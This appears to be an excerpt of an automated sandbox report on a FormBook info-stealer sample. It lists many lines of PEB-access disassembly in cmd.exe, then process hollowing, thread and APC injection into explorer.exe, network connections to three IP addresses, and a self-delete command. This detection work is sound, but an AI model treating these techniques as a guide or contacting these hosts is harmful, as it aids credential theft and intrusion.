          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030153CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F95210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03024257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F958EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F940E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC20A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030549A4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030169A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030151BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030241E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03064015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03064015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03061074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03052073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03013884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03013884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F99100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03017794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F9C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FC8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FD37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0302FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03060EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03060EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03060EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030146A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FAEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0304FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F94F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02F94F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FBF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03068D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0301A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03013540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03043D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FA849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FB746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_030605AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_02FCBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0305FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03048DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03051C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_0306740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_03016C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D86B20 GetProcessHeap,RtlAllocateHeap,GetProcessHeap,HeapAlloc,
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\cmd.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8C043 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8C020 SetUnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8C043 SetUnhandledExceptionFilter,UnhandledExceptionFilter,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 2_2_00D8C020 SetUnhandledExceptionFilter,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B7310 SetUnhandledExceptionFilter,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002B6FE3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 161.35.25.247 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.209.115.26 80
          Source: C:\Windows\explorer.exeNetwork Connect: 112.213.89.130 80
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Users\user\Desktop\RRW9901200241.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmd.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeThread register set: target process: 3440
          Source: C:\Windows\SysWOW64\cmd.exeThread register set: target process: 3440
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\RRW9901200241.exeSection unmapped: C:\Windows\SysWOW64\cmd.exe base address: 2A0000
          Source: C:\Users\user\Desktop\RRW9901200241.exeProcess created: C:\Users\user\Desktop\RRW9901200241.exe 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\RRW9901200241.exe'
          Source: explorer.exe, 00000003.00000000.355976618.0000000004F80000.00000004.00000001.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000003.00000000.346483863.00000000008B8000.00000004.00000020.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000003.00000000.346897457.0000000000EE0000.00000002.00000001.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: &Program Manager
          Source: explorer.exe, 00000003.00000000.346897457.0000000000EE0000.00000002.00000001.sdmp, cmd.exe, 00000004.00000002.679931331.00000000044A0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D8D757 cpuid
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,memmove,GetTimeFormatW,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetSystemTime,SystemTimeToFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,GetLocaleInfoW,GetDateFormatW,memmove,GetDateFormatW,realloc,GetDateFormatW,memmove,GetLastError,GetLastError,realloc,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,setlocale,
          Source: C:\Users\user\Desktop\RRW9901200241.exeCode function: 0_2_00D883D1 GetLocalTime,
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 4_2_002A443C GetVersion,

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.383682726.0000000001030000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.341808975.0000000001A00000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677144358.0000000000370000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.677857555.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.382481853.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.383234162.0000000001000000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.RRW9901200241.exe.1a00000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RRW9901200241.exe.400000.0.raw.unpack, type: UNPACKEDPE
